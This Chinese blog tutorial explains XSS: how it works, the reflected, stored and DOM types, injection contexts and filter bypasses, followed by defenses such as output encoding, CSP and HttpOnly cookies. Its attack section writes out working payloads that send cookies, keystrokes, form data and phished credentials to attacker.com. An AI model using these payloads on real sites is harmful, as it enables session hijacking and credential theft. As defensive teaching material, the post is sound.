<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="XSS 跨站脚本攻击：原理、攻击与防御, 是小竹不是小猪">
    <meta name="description" content="一、XSS 的核心原理1.1 本质：数据与代码的边界混淆XSS（Cross-Site Scripting，跨站脚本攻击）的根本原因是用户可控数据被浏览器当作可执行代码解释。
这与 SQL 注入的逻辑完全同构——SQL 注入是用户输入被数据库">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>XSS 跨站脚本攻击：原理、攻击与防御 | 是小竹不是小猪</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">是小竹不是小猪</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">是小竹不是小猪</div>
        <div class="logo-desc">
            
            每一年都奔走在自己的热爱里
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/14.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">XSS 跨站脚本攻击：原理、攻击与防御</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">安全</span>
                            </a>
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                            <a href="/tags/XSS/">
                                <span class="chip bg-color">XSS</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-08-06
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="一、XSS-的核心原理"><a href="#一、XSS-的核心原理" class="headerlink" title="一、XSS 的核心原理"></a>一、XSS 的核心原理</h3><h4 id="1-1-本质：数据与代码的边界混淆"><a href="#1-1-本质：数据与代码的边界混淆" class="headerlink" title="1.1 本质：数据与代码的边界混淆"></a>1.1 本质：数据与代码的边界混淆</h4><p>XSS（Cross-Site Scripting，跨站脚本攻击）的根本原因是<strong>用户可控数据被浏览器当作可执行代码解释</strong>。</p>
<p>这与 SQL 注入的逻辑完全同构——SQL 注入是用户输入被数据库引擎当作 SQL 指令执行，XSS 是用户输入被浏览器当作 JavaScript 执行。区别只在于执行环境不同：一个是数据库引擎，一个是浏览器渲染引擎。</p>
<p>浏览器解析 HTML 时，遇到 <code>&lt;script&gt;</code> 标签、事件处理属性（<code>onerror</code>、<code>onload</code>）、<code>javascript:</code> 伪协议等，会将其中的内容作为代码执行。如果这些位置的内容来自用户输入且未经转义，攻击者就能注入任意 JavaScript 代码。</p>
<h4 id="1-2-为什么-XSS-危险"><a href="#1-2-为什么-XSS-危险" class="headerlink" title="1.2 为什么 XSS 危险"></a>1.2 为什么 XSS 危险</h4><p>JavaScript 在浏览器中运行在同源策略（Same-Origin Policy）下，拥有对当前域名下 Cookie、localStorage、DOM 的完全访问权限。一段恶意脚本能做的事情包括：窃取 Cookie 和会话令牌、劫持用户操作（模拟点击、表单提交）、重定向到钓鱼页面、读取页面中的所有敏感数据（如银行卡号、个人信息）、利用用户身份调用后端 API。</p>
<p>如果配合社工手段，XSS 的危害会被进一步放大——攻击者不需要直接攻击服务端，而是让受害者自己的浏览器成为攻击载体。</p>
<hr>
<h3 id="二、XSS-的三种类型"><a href="#二、XSS-的三种类型" class="headerlink" title="二、XSS 的三种类型"></a>二、XSS 的三种类型</h3><h4 id="2-1-反射型-XSS（Reflected）"><a href="#2-1-反射型-XSS（Reflected）" class="headerlink" title="2.1 反射型 XSS（Reflected）"></a>2.1 反射型 XSS（Reflected）</h4><p>恶意脚本出现在 HTTP 请求中（URL 参数、表单字段），服务端将其原样返回到响应页面里，浏览器解析时执行。</p>
<p>典型场景：搜索框回显用户输入。</p>
<pre><code>https://example.com/search?q=&lt;script&gt;document.location=&#39;https://attacker.com/steal?c=&#39;+document.cookie&lt;/script&gt;
</code></pre>
<p>服务端如果直接将 <code>q</code> 参数的值拼入 HTML：</p>
<pre><code class="php">// 危险写法
echo &quot;&lt;div class=&#39;result&#39;&gt;搜索结果：&quot; . $_GET[&#39;q&#39;] . &quot;&lt;/div&gt;&quot;;
</code></pre>
<p>浏览器渲染时，<code>&lt;script&gt;</code> 标签被执行，Cookie 被发送到攻击者服务器。</p>
<p>反射型 XSS 的特点是<strong>非持久化</strong>——恶意脚本不存储在服务端，每次都需要诱导用户点击包含恶意参数的链接。攻击面在于 URL 参数被回显到页面的所有位置。</p>
<h4 id="2-2-存储型-XSS（Stored-Persistent）"><a href="#2-2-存储型-XSS（Stored-Persistent）" class="headerlink" title="2.2 存储型 XSS（Stored / Persistent）"></a>2.2 存储型 XSS（Stored / Persistent）</h4><p>恶意脚本被存储在服务端（数据库、文件系统），当其他用户访问包含该数据的页面时自动执行。</p>
<p>典型场景：评论区、个人简介、帖子内容、文件名展示。</p>
<pre><code class="html">&lt;!-- 攻击者在评论区提交 --&gt;
&lt;img src=x onerror=&quot;fetch(&#39;https://attacker.com/steal?c=&#39;+document.cookie)&quot;&gt;
</code></pre>
<p>这条评论被存入数据库。当其他用户浏览该页面时，服务端从数据库取出评论内容拼入 HTML，浏览器解析到 <code>&lt;img&gt;</code> 标签的 <code>onerror</code> 事件，脚本执行。</p>
<p>存储型 XSS 的危害远大于反射型，因为攻击者只需注入一次，所有访问该页面的用户都会中招。</p>
<h4 id="2-3-DOM-型-XSS（DOM-based）"><a href="#2-3-DOM-型-XSS（DOM-based）" class="headerlink" title="2.3 DOM 型 XSS（DOM-based）"></a>2.3 DOM 型 XSS（DOM-based）</h4><p>与前两种不同，DOM 型 XSS 的漏洞 entirely 发生在客户端。恶意数据从 DOM 中读取（如 <code>location.hash</code>、<code>document.referrer</code>、<code>window.name</code>），未经转义直接写入页面（如 <code>innerHTML</code>、<code>document.write</code>）。</p>
<pre><code class="javascript">// 危险写法
const hash = location.hash.slice(1);
document.getElementById(&#39;content&#39;).innerHTML = decodeURIComponent(hash);
</code></pre>
<p>攻击者构造 URL：<code>https://example.com/page#&lt;img src=x onerror=alert(1)&gt;</code></p>
<p>这段代码从 <code>location.hash</code> 取出用户输入，直接赋给 <code>innerHTML</code>，浏览器解析并执行。整个过程中恶意数据从未到达服务端，所以传统的服务端 WAF 无法检测。</p>
<p>DOM 型 XSS 的 sink（危险操作）常见的有：<code>innerHTML</code>、<code>outerHTML</code>、<code>document.write</code>、<code>document.writeln</code>、<code>eval</code>、<code>setTimeout</code>（字符串参数）、<code>new Function</code>。source（数据来源）常见的有：<code>location.hash</code>、<code>location.search</code>、<code>document.referrer</code>、<code>window.name</code>、<code>postMessage</code>。</p>
<hr>
<h3 id="三、攻击手段全景"><a href="#三、攻击手段全景" class="headerlink" title="三、攻击手段全景"></a>三、攻击手段全景</h3><h4 id="3-1-注入点与-Payload-形态"><a href="#3-1-注入点与-Payload-形态" class="headerlink" title="3.1 注入点与 Payload 形态"></a>3.1 注入点与 Payload 形态</h4><p><strong>3.1.1 HTML 标签内注入</strong></p>
<p>当用户输入被插入到 HTML 标签之间（如 <code>&lt;p&gt;用户输入&lt;/p&gt;</code>），攻击者需要闭合当前标签或引入新标签：</p>
<pre><code class="html">&lt;!-- 原始页面 --&gt;
&lt;p&gt;搜索结果：用户输入&lt;/p&gt;

&lt;!-- 攻击者输入 --&gt;
&lt;/p&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;p&gt;

&lt;!-- 渲染结果 --&gt;
&lt;p&gt;搜索结果：&lt;/p&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;p&gt;&lt;/p&gt;
</code></pre>
<p><strong>3.1.2 HTML 属性内注入</strong></p>
<p>当用户输入被放入属性值（如 <code>&lt;img src=&quot;用户输入&quot;&gt;</code>），攻击者需要闭合属性值和标签：</p>
<pre><code class="html">&lt;!-- 原始页面 --&gt;
&lt;img src=&quot;用户输入&quot; alt=&quot;avatar&quot;&gt;

&lt;!-- 攻击者输入 --&gt;
&quot; onerror=&quot;alert(1)&quot; x=&quot;

&lt;!-- 渲染结果 --&gt;
&lt;img src=&quot;&quot; onerror=&quot;alert(1)&quot; x=&quot;&quot; alt=&quot;avatar&quot;&gt;
</code></pre>
<p><strong>3.1.3 JavaScript 代码块内注入</strong></p>
<p>当用户输入被嵌入到 <code>&lt;script&gt;</code> 标签内的 JS 代码中：</p>
<pre><code class="html">&lt;script&gt;
  var userName = &quot;用户输入&quot;;
&lt;/script&gt;
</code></pre>
<p>攻击者输入 <code>&quot;; alert(document.cookie); //</code>：</p>
<pre><code class="html">&lt;script&gt;
  var userName = &quot;&quot;; alert(document.cookie); //&quot;;
&lt;/script&gt;
</code></pre>
<p>双引号闭合了字符串字面量，后面的代码被当作新的 JS 语句执行。</p>
<p>如果输入被放入单引号字符串，攻击者用 <code>&#39;; alert(1); //&#39;</code> 即可。如果没有引号包裹（如 <code>var x = 用户输入;</code>），攻击者可以直接输入 <code>alert(1);//</code>。</p>
<p><strong>3.1.4 特殊上下文注入</strong></p>
<p>某些 HTML 属性天然具有代码执行能力：</p>
<pre><code class="html">&lt;!-- href 属性 --&gt;
&lt;a href=&quot;用户输入&quot;&gt;点击&lt;/a&gt;
&lt;!-- 攻击者输入：javascript:alert(1) --&gt;

&lt;!-- style 属性（IE 低版本） --&gt;
&lt;div style=&quot;background:url(用户输入)&quot;&gt;
&lt;!-- 攻击者输入：javascript:alert(1) --&gt;

&lt;!-- src/iframe 属性 --&gt;
&lt;iframe src=&quot;用户输入&quot;&gt;&lt;/iframe&gt;
&lt;!-- 攻击者输入：javascript:alert(1) --&gt;
</code></pre>
<h4 id="3-2-绕过过滤的常见技巧"><a href="#3-2-绕过过滤的常见技巧" class="headerlink" title="3.2 绕过过滤的常见技巧"></a>3.2 绕过过滤的常见技巧</h4><p><strong>3.2.1 大小写混合</strong></p>
<pre><code class="html">&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt;
&lt;ImG sRc=x OnErRoR=alert(1)&gt;
</code></pre>
<p>如果过滤逻辑只匹配小写 <code>&lt;script&gt;</code>，大小写混合即可绕过。</p>
<p><strong>3.2.2 编码绕过</strong></p>
<p>HTML 实体编码、URL 编码、Unicode 编码、Base64 编码，不同上下文有不同的解码时机：</p>
<pre><code class="html">&lt;!-- HTML 实体编码 --&gt;
&lt;img src=x onerror=&quot;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;

&lt;!-- URL 编码（在 href 中） --&gt;
&lt;a href=&quot;javascript&amp;#x3A;alert(1)&quot;&gt;click&lt;/a&gt;

&lt;!-- Unicode 转义（在 JS 字符串中） --&gt;
&lt;script&gt;var x = &quot;\u0061\u006c\u0065\u0072\u0074(1)&quot;&lt;/script&gt;
</code></pre>
<p><strong>3.2.3 利用不常见的标签和事件</strong></p>
<pre><code class="html">&lt;!-- SVG 标签 --&gt;
&lt;svg onload=alert(1)&gt;
&lt;svg/onload=alert(1)&gt;

&lt;!-- Body 标签 --&gt;
&lt;body onload=alert(1)&gt;

&lt;!-- Input 标签 --&gt;
&lt;input onfocus=alert(1) autofocus&gt;

&lt;!-- Details 标签 --&gt;
&lt;details open ontoggle=alert(1)&gt;

&lt;!-- Marquee 标签 --&gt;
&lt;marquee onstart=alert(1)&gt;

&lt;!-- Video/Audio 标签 --&gt;
&lt;video src=x onerror=alert(1)&gt;
</code></pre>
<p><strong>3.2.4 双写绕过</strong></p>
<p>如果过滤逻辑只删除一次关键字（如将 <code>&lt;script&gt;</code> 替换为空），攻击者输入 <code>&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;</code>，删除内层后剩下 <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>。</p>
<p><strong>3.2.5 利用注释和换行</strong></p>
<pre><code class="html">&lt;script&gt;
// 如果过滤了 &lt;script&gt;，但没过滤 &lt;/script&gt; 后的内容
&lt;/script&gt; 后面的内容在某些解析器中仍可能被执行
</code></pre>
<p><strong>3.2.6 利用浏览器解析差异</strong></p>
<p>不同浏览器对 HTML 的容错解析行为不同。例如，某些浏览器会自动补全未闭合的标签，或者对嵌套关系有不同的理解。攻击者可以利用这些差异构造只在特定浏览器中触发的 payload。</p>
<h4 id="3-3-高级攻击场景"><a href="#3-3-高级攻击场景" class="headerlink" title="3.3 高级攻击场景"></a>3.3 高级攻击场景</h4><p><strong>3.3.1 XSS 窃取 Cookie 和 Session</strong></p>
<pre><code class="javascript">new Image().src = &#39;https://attacker.com/steal?cookie=&#39; + encodeURIComponent(document.cookie);
</code></pre>
<p>利用 <code>&lt;img&gt;</code> 标签发起 GET 请求，将 Cookie 作为 URL 参数发送到攻击者服务器。这种方式不会在页面上留下可见痕迹。</p>
<p><strong>3.3.2 XSS 劫持用户操作（BeEF 框架思路）</strong></p>
<pre><code class="javascript">// 拦截所有表单提交，注入隐藏字段
document.querySelectorAll(&#39;form&#39;).forEach(form =&gt; &#123;
  form.addEventListener(&#39;submit&#39;, function(e) &#123;
    e.preventDefault();
    // 将表单数据发送到攻击者服务器
    fetch(&#39;https://attacker.com/hook&#39;, &#123;
      method: &#39;POST&#39;,
      body: new FormData(form)
    &#125;);
    // 然后正常提交
    form.submit();
  &#125;);
&#125;);
</code></pre>
<p><strong>3.3.3 XSS + CSRF 组合攻击</strong></p>
<pre><code class="javascript">// 利用用户的登录态，以用户身份发起 POST 请求修改密码
fetch(&#39;https://example.com/api/change-password&#39;, &#123;
  method: &#39;POST&#39;,
  headers: &#123; &#39;Content-Type&#39;: &#39;application/json&#39; &#125;,
  credentials: &#39;include&#39;,  // 携带 Cookie
  body: JSON.stringify(&#123; newPassword: &#39;attacker_password&#39; &#125;)
&#125;);
</code></pre>
<p><code>credentials: &#39;include&#39;</code> 确保请求携带目标域的 Cookie，后端无法区分这是用户主动操作还是 XSS 发起的请求。</p>
<p><strong>3.3.4 XSS 键盘记录</strong></p>
<pre><code class="javascript">document.addEventListener(&#39;keypress&#39;, function(e) &#123;
  new Image().src = &#39;https://attacker.com/key?k=&#39; + encodeURIComponent(e.key);
&#125;);
</code></pre>
<p>监听全局键盘事件，将每次按键发送到攻击者服务器。可以窃取用户在页面上输入的所有内容，包括密码。</p>
<p><strong>3.3.5 利用 XSS 进行钓鱼</strong></p>
<pre><code class="javascript">// 覆盖页面内容，伪造登录框
document.body.innerHTML = `
  &lt;div style=&quot;position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999&quot;&gt;
    &lt;h2&gt;会话已过期，请重新登录&lt;/h2&gt;
    &lt;form action=&quot;https://attacker.com/phish&quot; method=&quot;POST&quot;&gt;
      &lt;input name=&quot;username&quot; placeholder=&quot;用户名&quot;&gt;&lt;br&gt;
      &lt;input name=&quot;password&quot; type=&quot;password&quot; placeholder=&quot;密码&quot;&gt;&lt;br&gt;
      &lt;button type=&quot;submit&quot;&gt;登录&lt;/button&gt;
    &lt;/form&gt;
  &lt;/div&gt;
`;
</code></pre>
<p>用户看到的是一个逼真的”重新登录”弹窗，输入的凭据直接发送到攻击者服务器。</p>
<p><strong>3.3.6 利用 <code>postMessage</code> 跨域通信</strong></p>
<p>如果页面监听了 <code>message</code> 事件但没有校验 <code>origin</code>：</p>
<pre><code class="javascript">// 目标页面的危险代码
window.addEventListener(&#39;message&#39;, function(e) &#123;
  document.getElementById(&#39;output&#39;).innerHTML = e.data;
&#125;);

// 攻击者在自己的页面上
&lt;iframe src=&quot;https://target.com/vulnerable-page&quot;&gt;&lt;/iframe&gt;
&lt;script&gt;
  document.querySelector(&#39;iframe&#39;).contentWindow.postMessage(&#39;&lt;img src=x onerror=alert(1)&gt;&#39;, &#39;*&#39;);
&lt;/script&gt;
</code></pre>
<hr>
<h3 id="四、防御策略"><a href="#四、防御策略" class="headerlink" title="四、防御策略"></a>四、防御策略</h3><h4 id="4-1-输出编码（最核心的防御）"><a href="#4-1-输出编码（最核心的防御）" class="headerlink" title="4.1 输出编码（最核心的防御）"></a>4.1 输出编码（最核心的防御）</h4><p>XSS 的本质是数据被当作代码执行，所以防御的核心是<strong>在数据插入 HTML 的位置做对应的编码</strong>，确保数据始终被当作数据处理。</p>
<p>不同上下文需要不同的编码方式：</p>
<p><strong>HTML 标签之间（HTML Context）：</strong> 编码 <code>&amp; &lt; &gt; &quot; &#39;</code></p>
<pre><code class="java">// Java: 使用 OWASP Java Encoder
String safe = Encode.forHtml(userInput);
// &amp; → &amp;amp;  &lt; → &amp;lt;  &gt; → &amp;gt;  &quot; → &amp;quot;  &#39; → &amp;#x27;
</code></pre>
<pre><code class="python"># Python: 使用 markupsafe
from markupsafe import escape
safe = escape(user_input)
</code></pre>
<pre><code class="php">// PHP
$safe = htmlspecialchars($userInput, ENT_QUOTES | ENT_HTML5, &#39;UTF-8&#39;);
</code></pre>
<p><strong>HTML 属性值内（Attribute Context）：</strong> 除了上述字符，还需要编码更多特殊字符</p>
<pre><code class="java">String safe = Encode.forHtmlAttribute(userInput);
</code></pre>
<p><strong>JavaScript 代码块内（JS Context）：</strong> 需要编码为 JS 字符串安全字符</p>
<pre><code class="java">String safe = Encode.forJavaScript(userInput);
// 编码 \xHH 形式，确保不会闭合字符串字面量
</code></pre>
<p><strong>URL 参数中（URL Context）：</strong></p>
<pre><code class="java">String safe = Encode.forUriComponent(userInput);
</code></pre>
<p><strong>CSS 值内（CSS Context）：</strong></p>
<pre><code class="java">String safe = Encode.forCssString(userInput);
</code></pre>
<p>核心原则：<strong>根据数据插入的位置选择对应的编码函数，不存在一种通用的编码适用于所有上下文。</strong></p>
<h4 id="4-2-Content-Security-Policy（CSP）"><a href="#4-2-Content-Security-Policy（CSP）" class="headerlink" title="4.2 Content Security Policy（CSP）"></a>4.2 Content Security Policy（CSP）</h4><p>CSP 是浏览器层面的第二道防线，通过 HTTP 响应头告诉浏览器哪些来源的脚本可以执行：</p>
<pre><code>Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; https://cdn.example.com; object-src &#39;none&#39;; base-uri &#39;self&#39;
</code></pre>
<p>这条策略的含义：默认只允许加载同源资源；脚本只能从同源和 <code>cdn.example.com</code> 加载；禁止 <code>&lt;object&gt;</code>、<code>&lt;embed&gt;</code> 标签；<code>&lt;base&gt;</code> 标签只能指向同源。</p>
<p>CSP 的关键价值在于：即使存在 XSS 注入点，如果 CSP 禁止了内联脚本（<code>unsafe-inline</code>）且没有可被利用的脚本源，攻击者也无法执行任意代码。</p>
<p><strong>CSP 的演进：</strong></p>
<ul>
<li>CSP Level 1：<code>unsafe-inline</code> 仍可被绕过，<code>nonce</code> 和 <code>hash</code> 机制引入</li>
<li>CSP Level 2：引入 <code>nonce-xxx</code> 和 <code>sha256-xxx</code>，精确控制可执行的脚本</li>
<li>CSP Level 3：引入 <code>strict-dynamic</code>，由受信任脚本动态加载的子脚本自动获得信任</li>
</ul>
<p>推荐做法：使用 <code>nonce</code> 机制，每次请求生成随机 nonce，内联脚本必须携带匹配的 nonce 才能执行：</p>
<pre><code>Content-Security-Policy: script-src &#39;nonce-rAnd0mV4lu3&#39;
</code></pre>
<pre><code class="html">&lt;script nonce=&quot;rAnd0mV4lu3&quot;&gt;
  // 只有携带正确 nonce 的脚本才能执行
  console.log(&#39;safe&#39;);
&lt;/script&gt;
</code></pre>
<h4 id="4-3-HttpOnly-Cookie"><a href="#4-3-HttpOnly-Cookie" class="headerlink" title="4.3 HttpOnly Cookie"></a>4.3 HttpOnly Cookie</h4><p>给敏感 Cookie 设置 <code>HttpOnly</code> 标志，阻止 JavaScript 通过 <code>document.cookie</code> 访问：</p>
<pre><code>Set-Cookie: session_id=abc123; HttpOnly; Secure; SameSite=Strict
</code></pre>
<p><code>HttpOnly</code> 阻止 JS 读取 Cookie，<code>Secure</code> 要求 HTTPS 传输，<code>SameSite=Strict</code> 阻止跨站请求携带 Cookie（防御 CSRF 的同时也降低了 XSS 窃取 Cookie 的价值）。</p>
<p>注意：<code>HttpOnly</code> 只保护 Cookie，不保护 localStorage 和 sessionStorage 中的数据。如果应用将 token 存在 localStorage 中，XSS 仍然可以通过 <code>localStorage.getItem(&#39;token&#39;)</code> 窃取。</p>
<h4 id="4-4-输入验证"><a href="#4-4-输入验证" class="headerlink" title="4.4 输入验证"></a>4.4 输入验证</h4><p>输入验证是辅助手段，不能替代输出编码，但能减少攻击面：</p>
<pre><code class="python"># 白名单验证：只允许预期字符
import re

def validate_username(username):
    if not re.match(r&#39;^[a-zA-Z0-9_]&#123;3,20&#125;$&#39;, username):
        raise ValueError(&quot;Invalid username&quot;)
    return username

# 对于邮箱、URL 等有明确格式的数据，使用标准库验证
from email.utils import parseaddr
name, addr = parseaddr(user_input)
if not addr or &#39;@&#39; not in addr:
    raise ValueError(&quot;Invalid email&quot;)
</code></pre>
<p>输入验证的价值在于：在数据进入系统时就拦截明显恶意的内容，减少后续处理链路中的风险。但它不能覆盖所有 XSS 场景（合法输入中也可能包含需要编码的字符），所以必须配合输出编码。</p>
